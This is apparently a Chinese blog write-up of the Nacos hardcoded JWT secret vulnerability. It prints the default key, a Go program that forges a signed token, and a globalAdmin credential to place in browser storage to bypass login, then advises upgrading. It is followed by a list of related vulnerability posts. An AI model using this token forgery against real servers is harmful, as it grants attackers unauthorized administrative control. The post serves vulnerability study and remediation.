NacosJWT密钥硬编码漏洞,未授权访问

最新推荐文章于 2025-07-31 12:47:03 发布
原创 最新推荐文章于 2025-07-31 12:47:03 发布 · 2.4k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #微服务 #spring cloud

Nacos是一个用于动态服务发现、配置管理和服务管理的平台,但在版本2.2.0.1之前存在默认加密密钥问题,允许恶意用户利用固定密钥生成有效凭证登录。通过PullRequest#9992已移除默认密钥,建议用户升级或更换密钥以修复安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、软件背景

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。

二、影响版本

版本 <  2.2.0.1

三、漏洞分析

1.根据commit修复记录可以看到:

Remove the default token.secret.key by KomachiSion · Pull Request #9992 · alibaba/nacos · GitHub

nacos在新版之前使用了默认的JWT加密key:

SecretKey012345678901234567890123456789012345678901234567890123456789

2.根据默认key生成token:

package main

import (
	"fmt"
	"github.com/golang-jwt/jwt/v4"
)

func main(){

    // 创建秘钥
   	key := []byte("SecretKey012345678901234567890123456789012345678901234567890123456789")
    // 创建Token结构体
	claims := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims{
		"sub": "nacos",
		"exp": "1678861310",
	})
    // 调用加密方法,发挥Token字符串
	signingString, err := claims.SignedString(key)
	if err != nil {
		return
	}
	fmt.Println(signingString)


}

生成token:

 

3.组装凭证:

{"accessToken":"*****","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}

替换accessToken内容,将此凭证字符串添加到local storge,刷新页面即可登录进入nacos后台。

四、修复

升级版本或将默认key值更换。

 

 

linglong扫描系统 JWT密钥硬编码 登录绕过漏洞复现
0xSec
04-27 780
linglong扫描系统 存在默认JWT密钥硬编码漏洞,未经身份验证验证得攻击者可构造JWT密钥绕着身份认证直接登录系统后台,造成信息泄露,使系统处于极不安全的状态。
【网络安全 | 漏洞挖掘】硬编码凭据泄露实现支付系统账户接管
等风来
01-02 2864
起初,这些密钥的用途并不显而易见。在追踪密钥的相关调用方法,并通过 jadx-gui 查看其在其他类中的引用后,我确认了它们的作用。在生成了JWT之后,我拦截了请求并替换了JWT,结果我成功接管了任意用户的支持账户。
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1578
JDK安装2023最完整教程与配置(零基础)
Nacos身份验证伪造漏洞(QVD-2023-6271)复现
最新发布
cfggbfxdgbb的博客
07-31 366
java web token(jwt)是java web中一种用于验证用户唯一标识的技术,通常会在用户首次登录后自动生成并储存在服务器中用于日后的再登录验证。登录成功,可以发现,即使伪造过去了,却依旧没有nacos账户该有的管理员权限,没有权限控制功能就是证明。,经代码审计发现可以通过特定算法(代码内会有标明是什么算法),加上用户名时间戳payload进行token伪造,从而绕过身份验证。点击下方的生成,即可获得伪造的其他用户的token。返回登录框,抓包进行登录,选择拦截该请求的响应。
Nacos 存在JWT密钥硬编码漏洞(MPS-2023-7982)
murphysec的博客
03-15 2133
Nacos 是一个动态服务发现、配置和管理的平台,可用于构建云原生应用程序。 该项目受影响版本存在硬编码漏洞。由于Nacos鉴权时采用默认的token.secret.key,远程攻击者可自行构造JwtToken绕过密钥认证进入后台,进而操控系统。
Nacos漏洞总结复现_nacos默认jwt密钥导致未授权访问
yy1715713348的博客
10-25 2215
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
nacos jwt 硬编码key 批量检测
viki1998的博客
06-20 410
jwt
漏洞复现之Redis未授权访问
m0_56190544的博客
09-13 2982
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
Android安全开发之浅谈密钥硬编码
热门推荐
AliMobileSecurity的博客
05-16 1万+
在阿里聚安全的漏洞扫描器中和人工APP安全审计中,经常发现有开发者将密钥硬编码Java代码、文件中,这样做会引起很大风险。本文详细分析了加密数据被破解的风险案例
SpringBoot Actuator未授权访问漏洞的全面解析与解决方案
Arvin627的博客
04-29 4238
引言SpringBoot Actuator 作为应用监控与管理的核心组件,为开发者提供了丰富的系统自省和运维能力。然而,其默认配置中可能存在的未授权访问漏洞,已成为企业安全防护的潜在风险。本文将从漏洞原理、影响范围、检测方法到解决方案,系统性地剖析该问题,并提供覆盖开发、运维、安全等多维度的防护策略,助力构建安全可靠的SpringBoot应用体系。
nacos漏洞汇总
潇逗
06-27 4127
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。指纹:app=“nacos”默认密码nacos nacos
Nacos未授权访问
zkaqlaoniao的博客
12-08 2301
漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
Nacos 未授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 1268
Nacos 未授权访问(CVE-2021-29441)
【渗透实战】Nacos未授权访问(CVE-2021-29441)
Nafia的博客
02-20 6832
Nacos未授权访问漏洞挖掘记录
漏洞复现】Nacos未授权访问
lza20001103的博客
09-18 1140
漏洞复现】Nacos未授权访问
[CVE-2021-29441]Nacos未授权访问漏洞漏洞复现
wxtnb4的博客
10-13 2339
Nacos 致力于帮助开发者发现、配置和管理微服务,提供了全面的微服务解决方案,包括服务的动态注册与发现、服务的元数据管理、动态配置服务、动态 DNS 服务、服务和元数据管理。在请求数据的过程中,服务器会去识别user-agent ,当user-agent为Nacos-Server时,则不需要进行认证,而且是直接将这种验证方式硬编码在代码中,从而导致此漏洞的产生。前面说过,如果访问时,将useragent改为Nacos-Server,就不会需要认证,在这种情况下,我们先尝试访问
等保整改之开启Nacos认证-漏扫发现我们使用Nacos时存在未授权访问漏洞
Heartsuit的博客
11-20 2925
我这里相关的服务有:网关服务、系统服务、认证服务、MinIO对象存储服务、WebSocket消息推送服务、定时任务服务、系统监控服务等)的配置文件。部署在专网中,并修改了默认密码),这让我们误以为后续的服务注册、配置读取与更新也是开启认证的。还是之前的一个小项目,部署在专网中,等保在做了一次漏扫后,说是有个高危漏洞要求整改。试想一下,你的服务注册、配置读取与更新接口竟然是暴露的,没有任何认证拦截的;可以直接访问到完整的配置信息,甚至包括各种服务的密码信息等,就问怕不怕。,发现接口403了,真棒。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值